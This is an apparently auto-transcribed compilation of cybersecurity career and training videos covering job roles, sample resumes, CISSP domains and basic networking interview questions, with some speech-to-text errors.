responsibilities and salary structure of a malware analyst let's move on to our last job role that is computer forensic analyst previously we have seen the job roles wherein they try to protect a company from a cyber attack in this role we will see how a computer forensic analyst works after a cyber attack a computer forensic analyst works on cases following an attack they collect digital evidences to retrieve information let's look into their responsibilities with the help of various investigation tools a computer forensic analyst gathers evidences from a system which was a victim of a cyber attack their main responsibility lies in recovering deleted manipulated or stolen data a computer forensic analyst helps various officials in investigating a case by discovering evidences from data which was manipulated or compromised there have been a lot of cases where a computer forensic analyst has come to the rescue of the police department moving on to the skills the candidate must hold a bachelor's degree and work experience in the related field is required for the post of a computer forensic analyst it is not necessary that the candidate must hold a computer science degree but the candidate must have relevant work experience a candidate must have knowledge of networking law and criminal investigation as they have to do a lot with investigating cases as well a sound analytical mind is critical as they have to analyze data and arrive at conclusions as to identify the cyber criminals the preferred certifications to become a computer forensic analyst are certified forensic computer examiner that is cfce and certified computer examiner that is cce well these were the skill sets required to become a computer forensic analyst moving on to the salary structures a computer forensic analyst earns nearly thousand dollars in the usc and in india a computer forensic analyst earns nearly eight lakh rupees per annum that was all about computer forensic analyst well those were the six top eight jobs in the field of cyber security now i will run you through a sample resume of a cyber security engineer this is only a sample resume of a cyber security engineer you can alter it according to your own preference here we first start off with the name and your email id and phone number then a quick summary about yourself and what you're good at and what you are looking for in an organization after which you can give your linkedin profile link and your github profile link if you have one moving on to the experience here you would have to give the company's name and the tenure ideally for a cyber security engineer the minimum number of years required is two and below that you can write the different responsibilities that were taken care by you in your previous organization tcp network administration and security monitoring are two important responsibilities that any cyber security engineer must have on their resume it is great if you have configured firewalls and ids as well underneath that you can mention the education and it is required that you have a degree in computer science or in information technology you can then mention your university and your gpa moving on to the skills we have technical skills and non-technical skills here under technical skills you would have to write the languages that are known to you for example c c plus plus which is a must java and python are preferred too knowledge of windows linux and unix operating systems will also have to be on your resume if you're applying for a post of a cyber security engineer the other skills depend from person to person here i have ids and ips penetration vulnerability testing encryption technologies knowledge of sql and at the end you can also write the certifications ideally a cyber security engineer must have ccna ccnp certifications in addition to it even a com ti plus certification is preferred moving on to the non-technical skills here you can mention the languages that you're good at the different competitions that you have participated in it can also have your co-curricular activities and anything to do with problem solving would also be an added advantage with the increase in the number of cyber crimes across the globe there is also an increase in the number of cyber security jobs and the role of an ethical hacker tops the list hi guys this is shruti from simply learn and today i will run you through this video on ethical hacking career so let's get started and explore the world of ethical hacking let's begin with a few facts did you know that by the year 2021 there will be 3.5 million cyber security job openings that is a huge number isn't it and also according to the u.s bureau of labor statistics there will be 28 increase in the number of jobs from 2016 to 2026 for information security analysts which includes ethical hackers this proves that there is a great demand for ethical hackers at the moment as i mentioned earlier the number of cyber crimes across the world will increase as the digital era will only continue to grow organizations will be on the lookout to hire professionals who can fight these cyber crimes and protect the company's data and to fight these cyber crimes we will require individuals who can think like a hacker and who is that well to do this job we have ethical hackers as you might be knowing an ethical hacker is trained to discover system vulnerabilities an ethical hacker is also known as a white hat hacker he or she is given authorization from the company to perform security assessments and at the end an ethical hacker would have to report the findings back to the company so that the vulnerabilities can be fixed an ethical hacker performs these security assessments with the help of various hacking techniques and tools let's now move on to our next topic that is the steps to become an ethical hacker you might wonder how to start your ethical hacking career right well i will take you through that step by step firstly the candidate must have a computer science or an information technology bachelor's degree it is also possible to become an ethical hacker without these degrees but provided you have the required skill sets and experience the next requirement to be an ethical hacker is that the candidate must have a minimum of two years of experience in the information security field you have to start your career with a software or a networking job and only then can you move on to the ethical hacking field you have to start your career with a software or a networking job and only then can you move into the ethical hacking field coming to the certifications it is necessary for the candidate to hold various cyber security certifications certifications play a vital role in the field of cyber security your job opportunities can solely depend on these certifications to become an ethical hacker you can start off with the foundational level certifications such as the ccna and comchia security plus certifications finally the last step to become an ethical hacker is to clear the certified ethical hacker examination ch certification is provided by the ec council it trains the candidate to protect a company's network by using the same tools and methods that a hacker would use the ch exam will have a duration of 4 hours with 125 number of questions if the candidate clears this exam then he or she will become a certified ethical hacker now that you know the steps to become an ethical hacker let's look into the skill sets which are required to help you achieve these steps first and foremost an ethical hacker needs to have an in-depth knowledge of the working of the operating systems knowledge of windows linux and macintosh operating systems is required for penetration testing creating exploits and bug hunting programming will be important so knowledge of programming languages such as cec plus plus html python and php will be very helpful basic knowledge of networking tcp protocols and osi model is necessary as networking is the foundation of cyber security for securing databases knowledge of sql nosql postgresql is necessary cryptography is used to secure information it is the process of converting data from a readable format to a non-readable format and vice versa cryptanalysis is decryption without a secret key in most cases certified ethical hacker would need to perform cryptanalysis hence ethical hacker has to be comfortable with cryptography and cryptanalysis ethical hackers should be proficient in network security control measures such as intrusion detection and intrusion prevention techniques now let's move on to the responsibilities which are taken care of by an ethical hacker let's have a look at these responsibilities an ethical hacker is responsible for scanning systems open and closed ports using tools like nessus and nmap vulnerabilities and threats are identified by doing this in addition to scanning for vulnerabilities they also search the deep corners of the network to spot critical information such as passwords which can make the organization vulnerable to an attack in addition to building and maintaining ids ips and firewalls they also try to evade these security measures to gauge the performance of the systems a lot of times a company's online fraud or online theft incidents are looked into by an ethical hacker an ethical hacker also checks for sniffing networks and hijacked web servers and applications those were the responsibilities of an ethical hacker now let's look into the various job roles an ethical hacker can apply for it is a misconception that an ethical hacker will perform only penetration testing well there are a number of other jobs an ethical hacker can apply for the different job roles such as that of a penetration tester information security analyst security consultant and an information security manager let's have a look at each of these job roles one by one a penetration tester performs the typical responsibility of an ethical hacker that is he or she tries to exploit a security system's vulnerabilities this is carried out using different hacking tools and techniques an ethical hacker can also apply for the role of an information security analyst there is a difference between the job rules of a penetration tester and that of an information security analyst here the candidate will be required to primarily design and protect the organization's network from various cyber attacks finally the candidate is also required to document the identified security breaches so that it can be omitted the next time the responsibilities of a security consultant is more or less similar to that of an information security analyst that we saw previously as a security consultant you will be responsible to design implement and maintain barrier security architectures in addition to this you are also required to upgrade the security systems as and when required finally an ethical hacker can also apply to the role of an information security manager as the name suggests this role will require the candidate to possess managerial skills as an information security manager is responsible to head the i.t and the information security team now that we have seen the responsibilities the skills and the steps to become an ethical hacker let's have a look at the different companies hiring ethical hackers to name a few we have bank of america ernest and young kpmg urban pro and ibm let's now look into the salary structure of an ethical hacker well in india the average annual salary of a certified ethical hacker is nearly 4 lakhs 76 000 rupees and in the us the average annual salary of a certified ethical hacker is 91 000 now i will guide you through a sample resume of a penetration tester as you can see on your screens this is a sample resume of a penetration tester we will look into this resume closely and understand how your resume should look like if you are applying for the role of a penetration tester as always you can start off with your name and your email id and your phone number followed by a brief summary of your current job profile it is preferred to add your linkedin profile link here and also your github profile link if you have one as i mentioned earlier this is a sample resume for a penetration tester and hence we have to have more than two years of experience in the information security field as you can see under the experience section the candidate has two prior experiences out of which the first experience is that of a software tester and second is that of a penetration tester you would have to mention your latest or current experience at the beginning you can mention your job role and the company and the duration under which you can list out the various responsibilities that you are looking into currently if you are a penetration tester you can mention responsibilities such as security monitoring black box testing documentation of the results vulnerability scanning and so on below this you can mention your first company's experience with the roles and responsibilities that you have performed earlier here the candidate was a software tester before becoming a penetration tester let's move on to the education section here the candidate holds a bachelor's degree in computer science you can mention your degree followed by the university name or if you're applying for any other role in the cybersecurity domain it is recommended that you list out the certifications as well to start off with a ccna certification will be preferred followed by a certified ethical hacker certification which is a must if you are applying for the role of a penetration tester in addition to it the certified expert penetration tester certification will also hold a great advantage after mentioning the certifications you can go ahead and mention your skill sets here we have the technical skills and non-technical skills under technical skills you can mention the programming languages that you know here we have c c plus plus java perl you can also mention the operating systems that you have worked on for example windows linux unix and in addition to the programming languages and the os you can also mention the tools that you know such as nmap metasploit tools which will be helpful if you are applying for the role of a penetration tester then you can also mention encryption technologies knowledge of sql and bug tracking systems if you have worked on them before if you have participated in a code authored you can mention that here as well under the non-technical skills you can mention various competitions that you have taken part in and the games that you like and other extracurricular activities finally you can also mention the projects undertaken under the projects undertaken you can talk about the various projects that you have performed in your company or outside the company here we have two projects one as a software test engineer and second one as a penetration tester so this is how a resume of a penetration tester will look like so let's start off this tutorial by understanding the need for the cisp certification if you have seen our previous videos you would be aware of the various cybersecurity certifications like ccna comtia security plus cism cisa and ch to name a few you might have also come across the cssp certification let me tell you this is one of the toughest and most in demand certification in the cyber security field in the current times managing information security in a company can be extremely challenging with the advent of the internet and various other technologies there is a large exposure to various security breaches the presence of information security experts in-house helps organizations manage their i.t processes in a better way this is where a cisp professional is in demand by employers compared to the other cyber security professionals the demand for cssb certified professionals has grown rapidly there are nearly 50 000 job postings for the same now that you have an idea of the demand of cssp certified professionals let's move on to understanding what exactly is cisp cssp stands for certified information system security professional it is considered the gold standard in the field of information security this certification is taken up by id professionals it trains a candidate to become an information assurance professional taking up the cssb certification will help you define the design architecture controls and management of highly secure business environments you will also be called a cssp professional only after you successfully passed the cssp exam so now let's have a look into the cssp exam requirements the primary requirement for any candidate is that they should have at least five years of work experience in the field of information security in addition to this it is also suggested that the candidate clears other certifications like ccna comchair security plus ceh casm and cisa to name a few cssp is considered as an advanced level cyber security certification hence it is better if the candidate clears the basic level and the managerial level certifications before moving to the cssp certification as i mentioned earlier this certification is suitable for professionals who have a minimum of five years of work experience professionals working as security consultants and managers network and security architects id directors security auditors and chief information security officers can take up the cssp certification let's now move on to our next topic that is cisp domains this entire certification is grouped into a total of eight domains the broad spectrum of topics included in cssp ensure its relevance across all disciplines in the field of information security successful candidates are competent in the following eight domains they are security and risk management then we have asset security security engineering communications and network security followed by identity and access management then security assessment and testing security operations and finally we have software development security these eight domains deal with different aspects of information security we will have a look into each of these individually and understand what each of these domains symbolize first up we have the security and risk management domain as the name suggests this domain mainly consists of the fundamentals of security policies compliance law and regulations professional ethics risk management and threat modeling cyber security and information security place a major role in this domain there is a difference between cyber security and information security which is more often missed out on by people cyber security refers to several techniques used to protect the integrity of networks whereas information security refers to processes and tools deployed to protect sensitive information to implement cybersecurity we have a list of approaches like compliance based ad ad-hoc and risk based in compliance based security measures are decided based on regulations while in ad hoc security measures are based on no specific criteria in risk-based security measures are based on unique risks depending on the organization let's now have a look at the cia triad here c stands for confidentiality i for integrity and a for availability confidentiality integrity and availability have served as the industry standard for computer security since the time of the first mainframes confidentiality means that information and functions can be accessed only by authorized parties for example military secrets integrity means that information and functions can be added altered or removed only by authorized people and availability means that systems functions and data must be available on demand now that we have understood the cia triad let's have a look at the grc trilogy this trilogy is a structured approach adopted by organizations to align it objectives with business objectives first up we have governance such a program has motives like ensuring goals are achieved providing strategic plans and so on governance is taken care of by the senior professionals of an organization next up we have risk management here the organization looks into mitigating all types of risks such as investment physical and cyber risks finally we have compliance as discussed previously compliance refers to abiding by the defined laws and regulations so who do you all think develops a security policy which is used to achieve the organization's goals well it is done by the senior management of an organization let's have a look at the characteristics of these security policies first and foremost these policies should support the vision and mission of the company all the business units should be integrated in these security policies they should also be regularly updated and finally it is important that these security policies should be easy to understand so that everyone can abide by them without any problem in addition to security policies a risk analysis team is also formed an organization to perform the analysis of each known risk there are various steps to perform risk analysis let's have a look at each of these first the team makes an assessment of the value of the company's assets then there is an analysis made based on the risks to assets and finally the team discovers solutions to mitigate these risks now that was all about the first domain of cisp security and risk management let's have a look at the second domain asset security asset security deals with the collection and protection of assets such as data and devices here we will be looking into data classification data management data remnants and data loss prevention so in data classification the data owner classifies data a data owner can be an individual or a group of people who created the information and are directly responsible for it this classification is done based on a set of predefined criterias at the end the classification is annually reviewed to see if there has to be some change incorporated data management involves managing the information lifecycle needs of an enterprise in an effective manner it also ensures that the data complies to the set standards and finally data management also ensures data validity and integrity moving on to data remnants it is a term used for the residual of digital data that is present even after trying to erase the data data remnants should be avoided as data should be completely destroyed to tackle data remnants we have methods like overwriting and destruction to name a few in overwriting other information is written over the data several times so that the original data cannot be recovered in destruction data in the storage device is physically damaged to make recovery difficult asset security also looks into data loss prevention here several measures and risk assessments are performed to ensure that information is only available to authorized users let's now move on to our third domain security engineering as the name suggests this domain talks about security architecture security models cryptography and physical security security architecture establishes a common practice for creating analyzing and using architecture description within a particular domain security architecture takes the help of tcb that is trusted computing base security parameter and reference models to implement security cryptography is also a part of security engineering in cryptography information is secured by converting data from a readable format to a non-readable format and vice versa moving to our fourth domain we have communications and network security this domain is all about network structures transmission methods and security measures used to achieve cia in an organization osi model is the foundation of networking this model that is the open systems interconnection model osi model describes how data is transferred from one computer to another the osi model consists of seven layers starting from physical layer then data link layer network layer transport layer session layer presentation layer and finally application layer in the first layer that is physical layer transmits raw bitstream over the physical medium then data link clear defines the format of data on the network network layer provides logical addressing and it also provides path determination using local addressing the fourth layer that is transport layer provides end-to-end connections in this layer data is transmitted using transmission protocols including tcp and udp the session layer maintains connections and it is also responsible for controlling ports and sessions the sixth layer that is a presentation layer ensures that data is in a usable format and finally in the seventh layer that is the in the application layer human computer interaction happens here applications can access the network services the communications and network security domain also talks about firewalls we can define a firewall as a hardware or software which is used to block the incoming or outgoing traffic from the internet to your computer then we also have the ids ids is known as the intrusion detection system this is designed to detect unauthorized access to a system ids is used together with a firewall and a router moving to identity and access management of fifth domain let's have a look at what this domain is all about this domain of cisp is all about the access control identification authorization and attacks on access control and its counter measures to be able to access a data set or a resource a subject has to be identified authenticated and authorized identity management kerberos and access criteria are few of the crucial fields here in identity management through automated means users are identified and authenticated this domain also speaks of kerberos an authentication protocol that is based on symmetric key cryptography and provides end-to-end security access to data shouldn't be granted to anyone and everyone in fact it should be granted based on the level of trust and the job role in the organization it is also better if it is provided based on the location and the time let's now have a look at our sixth domain security assessment and testing so in this domain we will look into audit security control assessment and testing reports as you might have heard of the term audit it is nothing but a repeated process wherein an independent professional evaluates and analyzes evidence then we have vulnerability assessment wherein it risks are identified and evaluated it helps in identifying quantifying and prioritizing vulnerabilities a well-planned and executed assessment and test strategy can provide valuable information about risk and risk mitigation the assessment and test is executed by a working group called the integrated product team testing is performed to check the data flow between the application and the system up next we have the security operations domain the seventh domain of csp is all about investigations monitoring and logging disaster recovery and change management here we will look into the fields of digital forensics incident management and perimeter security investigation of a computer crime is also known as computer foreign six in digital forensics data is examined to identify recover and analyze opinions about digital information incident management works to restore the services to normal as soon as possible a team called the incident response team is deployed to handle such emergencies incidence response is defined as a practice of detecting a problem determining its costs minimizing the damage resolving the problem and documenting each step this team provides management with sufficient information and defends the company against future attacks in perimeter security there is perimeter defense which allows us to detect and keep a check on unauthorized physical access this field also controls the access to the facility moving on to our eighth and final domain we have software development security as the name suggests this domain talks about security in a software development lifecycle here we will be looking into topics like api malware spyware adware social engineering attacks and sql injection attack let's start off with the application program interface known as api api is basically a collection of protocols and functions used to create applications it supports formats such as representational state transfer rest and simple object access protocol rest is nothing but using the present features of the web in a simple way and soap which is an acronym for simple object access protocol is a messaging protocol for exchanging data among computers now let's move on to malware as a security threat malware is a term which refers to malicious software viruses ransomware and worms we can also call trojan virus as a form of malware which is capable of disguising itself as a legitimate software malware is basically a broad term that refers to a variety of malicious programs one way to protect your software from malware is to always double check your downloads moving on to our next security threat spyware as the name suggests this is a software that typically spies on your system spyware is also a type of malware which is used to secretly gather information of the victim to give it to a third party those programs that secretly record all that you do on your computer are called spyware it is always advised to turn on pop-up blockers to prevent spyware next up we have adware adware is also known as advertising supported software it is a type of malware that constantly displays ads and pop-ups some of such ads can also gather your information at times adware is not all that dangerous but it is a hassle as it is a gateway to unwanted advertising on the screen and it can also change the browser homepage adwares are known to display unwanted annoying advertisements on your screens let's now have a look at social engineering attacks it is basically the art of manipulating people so that they end up giving their confidential information this attack lures victims into handing over their confidential data this attack takes place by tricking the human mind the most common social engineering attacks are fishing spear phishing and whaling fishing attack phishing attack is a practice wherein the hacker usually sends fraudulent emails which appear to be coming from a very trusted source this is done to install malware or to steal sensitive data like credit card information and various other login credentials spear phishing attack is a variation of phishing here the attacker targets a specific individual or a group of people and in wailing phishing attack wealthy powerful and prominent individuals are made targets moving on to our next attack we have sql injection attack sql injection attack is a type of code injection attack in a database driven website the hacker manipulates a standard sql query it allows attackers to tamper with the existing data here malicious code is inserted into the sql server to obtain information we are going to look at 10 different questions on networking then we'll have 10 more questions on software and programming another 20 questions on operating systems and applications 10 questions on cyber attacks and then the finally 10 questions on cryptography so we're going to discuss over 50 odd questions each in these different fields which will help you crack your interviews as far as cybersecurity is concerned let's start off with networking questions let's start off with question one what is the osi model explain the different layers of the osi model osi largely is a theoretical model uh utilized to understand networking and how data packets are created and how they are being processed by a computer this is normally used by the tcp the transmission control protocol over internet protocol software suite so osi is known as the open systems interconnection model it is a reference model that describes how applications are going to interact with via the computer network there are seven different layers that we need to understand they are as follows so in this diagram there are these seven different layers we start off from the bottom first is the physical layer the data link layer network layer transport layer session layer presentation and application when such a question is asked in an interview it is not only that we identified these seven layers explaining what the osi model is in the first place we then try to identify these seven layers and we give a brief description about each and every layer if there are any additional questions they will come after this basic question so let's start off with the physical layer this is the lowest layer of the osi model now this is where any and every physicality of your computer comes into the picture so it could be a network interface card it could be an rj45 or a cat5 cable anything that allows data to be transmitted physically from your machine to another machine next comes the data link layer so on the data link layer as far as networking is concerned we just need to understand that data packet is encoded decoded into bits at this layer this is also the layer that deals with mac addressing so the physical address of every network interface card which is the mac address which is utilized to route data packets over the network this is where the mac address resides on the data link layer the next layer is the network layer here datagrams are transferred from one to another the function of this layer are routing and logical addressing the moment we talk about routing and logical addressing ip addresses come into the picture ip version 4 ip version 6. so network layer will deal with ip addressing and the routing of those packets then comes the transport layer this is the layer responsible for end-to-end connections that automatically signifies that this is where tcp and udp will be working tcp stands for transmission control protocol udp for user datagram protocol tcp is a connection oriented protocol whereas udp is a connection less protocol these two protocols are utilized to establish connectivity between two machines tcp is a more reliable method of connectivity because there are a lot of packets that are sent across to verify that the data has been sent data has been received and so on so forth whereas udp is a connection less protocol where data is just dumped without verifying whether the receiver actually receives that data or not so in a nutshell on the transport layer tcp and udp make their appearance and this is where that functionality lies then comes the section there this controls signals between the computer it establish maintains and terminates connections between processes so in the transport layer we talked about tcp and udp udp being a connection less protocol where data is just transmitted without verifying whether the receiver received that data or not whereas tcp we studied is more of a reliable protocol thus there are different packets signals that will be sent across to verify that data has been transmitted it has been received properly and then the next segment of that data is being sent so those control signals are established using the session layer so the three-way handshake of tcp the acknowledgement packets and those kind of packets will be taken taken care of on the session layer of the osi model then comes the presentation layer the presentation layer is responsible to translate data into the application layer format so the formatting right mime or encoding that is being utilized the utf-8 character set that we utilize for uh presentation encryption mechanisms all of these work on the presentation layer and finally comes the application layer where the application itself uses a particular protocol so that the other machine on the receiving end the application on that machine would be able to understand what the communication was about right so in a nutshell if i start from up top the application layer will deal with any of the data that the application is generating so maybe an user input you're logging in you're typing the username password all that data will be constructed let's say into an http or https format that's where application layer comes into picture then the formatting of which into utf-8 and the encryption of which would be done at the presentation layer then this uh transport layer and the session layer would kick in to establish a tcp session do the three-way handshake establish that connectivity ip addressing would be done on the network layer mac addressing would be done on the data link layer and when everything is ready on the physical layer the packet will be sent out at the receiving end the packet will be received on the physical layer and then all these layers will be reversed and finally at the application layer the data would be presented to the application who would then execute it and showcase it on the screen of the recipient so this is the way you want to explain this question you want to be very concise precise about what you are explaining you don't want to go into two hypothetical scenarios you don't want to delete earlier with the layers you just want to give the basic functionality want to demonstrate that you understand what the osi layer is how the computer functions and you want to move on from there if the interviewer has any further follow-up questions they will ask those specific questions so that's question one moving on to the question two question two is define unicasting multicasting and broadcasting now this is a question which can be very lengthy but again most of your interview questions are designed that way it's basically to understand how much conceptually you are aware about these technologies so you have to be very concise don't go uh rattling about technology too much but in a concise manner just try to explain what these things is so when data is being transmitted over a network it can be transmitted either in one of these particular manners it can either be a unicast multicast or a broadcast so what is unicost unicast is when a message is sent from a single user to a single receiver so one to one right so one machine talking to another machine and nobody else so also known as point to point communications one point to one of the point if you have to send information to multiple receivers then you will have to send it using multicast right so this is where your multicast networking comes into picture so in our case uh let's assume it's a network where there are there's a class c network approximately 255 odd machines and within these there are two machines that want to talk to each other if they want to talk between each other it would be a point to point communication where they will utilize unicast where only these two machines will have visibility of that conversation and the other machines will not even realize that this conversation is taking place if one machine wants to talk to multiple machines then the multicast comes into the picture as the name suggests in this mode of communication data is sent from one or more or more sources to multiple destinations multicast uses the internet group management protocol also known as the igmp protocol to identify groups so under this igmp protocol various groups are created where machines are subscribed to those particular groups and whenever a message needs to be sent through those groups it will be identified by the igmp protocol and then that particular message will be sent to those multiple machines that are members of those particular groups and then comes the broadcast the third method is known as the broadcast as it says it is going to broadcast to all so this is one to all that is communication between a single user and it is going to be sent to all the machines in that particular network right so the three ways unicast is one two one multicast is one to many and broadcast is one to all then question number three what is dns dns stands for domain name system it is like the internet's phone book that is responsible for mapping the domain name into its corresponding ip address and let me give you an example over here whenever we go and open up let's say a browser a google chrome browser we type in www.google.com and then we press enter and magically google comes in front of us the website rather now how does the computer know who google is because as far as we are concerned humans understand google and words like that computers don't computers deal with binary zeros and ones right and as far as internet is concerned they will only deal with ip addresses and mac addresses so how does a computer know how to find google.com and where is it located so the moment we type in in the browser window in the address bar google.com and press enter a dns query is generated automatically by the browser where a packet is sent to our dns servers asking what the ip address is so in short dns resolves domain names to their corresponding ip addresses there is a dns server which will have this index a database of all the domains associated with their ip addresses if one particular dns server does not have that information that you are looking for it may query another dns server who may have that particular response so the first thing is when you type in domain name it gets resolved with the dns it identifies the ip address corresponding to that particular domain name and thus allows the computer to route that packet to the particular server where that domain name resides so in this scenario if you look at the screen on the local pc you have typed in cybersecurity.com there's a dns resolution that a query that goes to the dns server what is the ip of cybersecurity.com the dns server looks it up in its particular database if it has the corresponding ip address it will then respond back the ip addresses 172.17.252.1 after which the packet is sent off to cybersecurity.com moving on to question number four what is a firewall now this is a very good question and normally a very basic answer that i've ever heard is that a firewall is a hardware and a software firewall but that's the functionality of a firewall that is what how we can install a firewall but there are different types of firewalls and there is a specific functionality that the firewall is created for right so firewall is either a hardware or software but its responsibility is for blocking either incoming or outgoing traffic from the internet to your computer they secure a network so essentially the firewall will allow a connection to happen or disallow a connection to happen it won't go beyond that that's the basic functionality of a firewall okay so based on the configurations that you have done based on the rules that you have created on the firewall it will then based on those rules identify whether some traffic is allowed in that network or some traffic is to be blocked from entering that network so as the screen shows the firewall rules will analyze whether the traffic is good if yes it will allow if the traffic is bad it will block the traffic and not allow that connection from happening in the first place now there are a few common types of firewalls that also need to be included in the answer to this question and the first one is a packet filtering firewall these are the most common types that you will come across which analyze packets and lets them pass through only if they match an established security rule set now here people do get confused when we say that we analyze packets people think that these firewalls will analyze the contents of that packet which is not correct when a definition for a packet filtering firewall says that these firewalls analyze packets it means that they are only analyzing the source and destination ip addresses port numbers and the protocols that are mentioned in those packets these firewalls do not have the capability of deep packet inspection or dpi as it is known if that capability comes into the picture you're basically looking at an intrusion detection system or intrusion prevention system in today's world called as a next-gen firewall okay so a packet filtering firewall essentially will only analyze data packets for its source and destination ip addresses port numbers and the protocol that is being utilized it will then map that information to the rules that are there on the firewall and based on those rules it will either allow that a collection to happen or disallow that connection from happening the second type of is a proxy firewall these firewalls filter network traffic at the application level so when you say application level they work at the layer 7 of the osi model packet filtering firewalls since we have mentioned that they've worked on ip addressing and port numbers will work on the network layer of the osi model also on the transport layer because you also look at protocols proxy firewalls will work at layer 7 which is the application layer of the osi model and we'll deal with application level protocols such as http https ftp smtp and so on so forth and the third one is a stateful multi-layer app inspection firewall these filter packets at the network transport and application layers so they basically do the job of the first and the second type of firewalls the packets are compared to known trusted packets but now the first question is if there is a stateful multi-layer inspection firewall why do we have type 1 and type 2 firewalls like packet filtering and proxy firewalls that is because that is how the firewalls have evolved we started off with the packet filtering then we added functionality to it and so on and so forth so if a question comes what is a firewall you start off with the option saying it is a hardware or software this is the responsibility the functionality of a firewall is to allow good traffic and disallow bad traffic based on the rules that have been configured on the firewall and then you've got basically three types of firewalls packet filtering proxy and stateful multilayer and just include a brief description of each of these firewalls if getting your learning started is half the battle what if you could do that for free visit scale up by simply learn click on the link in the description to know more then moving on to question number five what is a vpn vpn is also called a virtual private network it is a connection between a vpn server and a vpn client so it basically creates an encrypted tunnel between the client and the vpn server which is then utilized to secure the connections that you're making with the internet so as you can see in the diagram the user has a vpn client installed on the machine the vpn client then creates an encrypted tunnel to the vpn server and through this tunnel encrypted data is transmitted which can then be processed by the vpn server uh sent to the internet information can receive can be received back by the vpn server the vpn server will encrypt that data back and send it back to the user so if there is a man in the middle attack that is happening or a hacker trying to eavesdrop on the communication mechanism they will not be able to do so because of the encrypted it is very difficult to decrypt this or hack through this encrypted tunnel it is possible but it is very difficult to achieve that moving on to question number six what are the advantages of distributed processing now before we go into advantages of distributed processing we first have to understand what is distributed processing so it is a term which describes various computer systems that use more than one processor to run an application here multiple computers across different locations share the same processor the advantages of distributing processes are as follows but before we go into the advantages distributed computing is basically where multiple machines will pull their resources together to run a singular application so an application that has multiple resources and can scale up and scale down as and when required the advantages are that it can be very very useful in data recovery for example raid where you're striping data on various hard disks it is reliable it is cheaper lower cost can be achieved and it is easy to expand because of the scalability factor that we just talked about if there is loss of data in one computer it can then be recovered by another interconnected computer and one of the examples would be blockchain in today's world right what is blockchain that this data is uh created live and stored on a connection of computers so if one of the computers goes offline the other computers in that network will still have that data and there the blockchain will still function without any issues the second point a glitch in one machine does not affect the processing as there will be multiple other machines like we discussed in the blockchain several cost effective mini computers are used instead of costly or mainframe machines so instead of having a server bank i can have multiple machines connect interconnected together and they can function in that particular blockchain or for that particular distributed processing mechanism depending on the amount of data processing more computers can be attached to the network thus you can increase the number of computers that can be a part of that blockchain or you can reduce them as and when necessary moving on to question number seven what is tcpip tcp or transmission control protocol over internet protocol is a set of communication protocols that are used to interconnect networking devices on the internet this protocol defines how data should be transmitted over the internet by providing end-to-end communications so essentially if you want networking to be established on your machine you will need tcp without tcp iep there will be no work groups there will be no domains basically your interconnectivity will go for a toss tcp is a software that once installed on your machine will then interact with the hardware which is your network interface cards and then your switches wires cables and all those through protocols that have been already pre-configured in it so within the tcp iep suite of softwares you will have all the protocols all the functionality of the osi layer and each and every protocol that works on each and every layer will be predefined and pre-configured to work in a particular manner the internet protocol is all about routing each individual packet to make sure it reaches its destination so with the tcp you're talking about the protocols that will allow you to format the data and generate it so that you can communicate it over the network the ip will then deal with the routing of those packets so that the packet can be routed to the correct computer and be received by the recipient so the tcp model is the compressed version of the osi model the seven layers will get converted into four layers the network access layer internet layer transport layer and application layer going on to question eight what do you mean by ipconfig and ifconfig both of these are commands the first one on a windows machine the second one on a linux machine so ipconfig is known as the internet protocol configuration this is a command that is used on the command line interface of microsoft windows to view all the adapters and the configuration of each and every adapters for their network interfaces so as you can see on the right hand side in the command prompt screen if once you type in the ip config command on the c prompt and press enter it will give you a list of all the adapters that are there so you can see wireless lan adapter local area connection the media is disconnected it doesn't exist at the bottom you'll see the wi-fi connection wireless lan adapter and can give you the ip version 6 ip address ipv version 4 address the subnet mask and the default gateway so this is the configuration that allows the machine to know on what network it is on what is the default gateway for communicating to the internet what is the subnet mask so how many computers may exist in that particular network and what is the ip address of that specific computer so that it can communicate across the network as well ifconfig is the same thing on the linux mac or unix operating system so the command will also give you the list of interfaces and the configuration of each and every interface it is used to configure control the tcp ip network interface parameters from the command line interface it allows you to see the ip address of these network interfaces so here you can see uh the wlp19s the ip address being 192 168 43.215 subnet mask being 255.255.255.0 with the broadcast being 192.168.43.255. question nine what is the difference between a domain and a work group this can be a very interesting question and can be a very lengthy question at the same time a work group is nothing but a decentralized network where you have interconnected multiple machines together and each machine acts in its own individual capacity thinks of itself as a server right so a decentralized network use every user manages the resources individually on their pc so local users on their own pcs managing the network shares what can be shared from that particular machine what data should be shared should not be shared to whom it can be shared with and so on so forth it is good if you've got a small network uh a few machines all together uh and you want them to interact with minimal management effort right so each computer each user will decide what they want to allow other users to see on that particular network and all of them would be connected over a lan a local area network either a wireless or a wired one so if you look at your home wi-fi right now that is one of the best examples of having a work group the domain on the other hand is a centralized network model so in a corporate environment whenever you go there and you got a domain based username and password which when entered onto a particular machine gives you access to the entire network or whatever applications and whatever resources have been allocated to you that is where the domain comes in so it it also uses a single sign on mechanism for all the resources that are made that are to be made available to you whereas in a work group your local user only meant for that particular computer right so coming back to the domain it is an administrator who is going to manage the entire domain and all of the resources connected to the domain the resources could be switches routers servers data stores applications web servers mail exchange servers and so on so forth so all of these are administered by an administrator through the domain it is the most reliable and optimum solution for a large network where multiple users are going to interconnect and share that data amongst each other right the computer can be connected to any network that means you can be on the internet and through the internet using a vpn you can connect to your corporate network authenticate in and get access to whatever resources you are allowed to access whereas in a work group you have to be a part of that network to access that internet if you change your location you go and connect to another wi-fi you will lose access to your previous wi-fi then the last question for the networking section what is data encapsulation in networking data encapsulation refers to the process of adding headers and trailers to the data the data link layer binds each packet into a frame that contains the hardware address of the source and the destination computer so in this example when you're talking about data encapsulation we have talked about how data that has been created by the application layer we'd have a header and a trailer that will give the various informations of where that data needs to be sent so the hardware address which is the mac address comes into the picture and gets added to the header and the ip addresses port numbers and all of those things would then be added to this uh trailers as well so that the data can be then routed to the intended recipient of that particular communication with this we end the first 10 questions in networking and in this video we are going to look at software and programming so we're going to look at the first 10 questions first question being how do you keep a computer secure now this is going to be a very generic question so you want to put your best foot forward and you want to identify the most common methodologies on how you can keep a computer secure so when you talk about computers the first thing that you want to talk about is authentication mechanisms where you want multi-factor authentication or two-way authentication to ensure that your accounts are kept secured now if you look at using passwords depending on how passwords are being stored by the application uh password attacks can be possible either a brute force attack or a dictionary based attack uh or even password guessing attacks are possible to mitigate those kind of attacks you will need multi-factor authentication to ensure that accounts are kept secure now even if we are using multi-factor authentication we also want to look at secure passwords which means that the password is complex enough to withstand most of the common attacks and a brute force attack or a dictionary attack is just not possible so we want to randomize our passwords we want to create a complexity where a password meets standards such as me has at least one lowercase one uppercase character has numerics and special characters and is randomized as not based on a dictionary word doesn't contain usernames email addresses phone numbers or anything that is personal to that particular user third keep 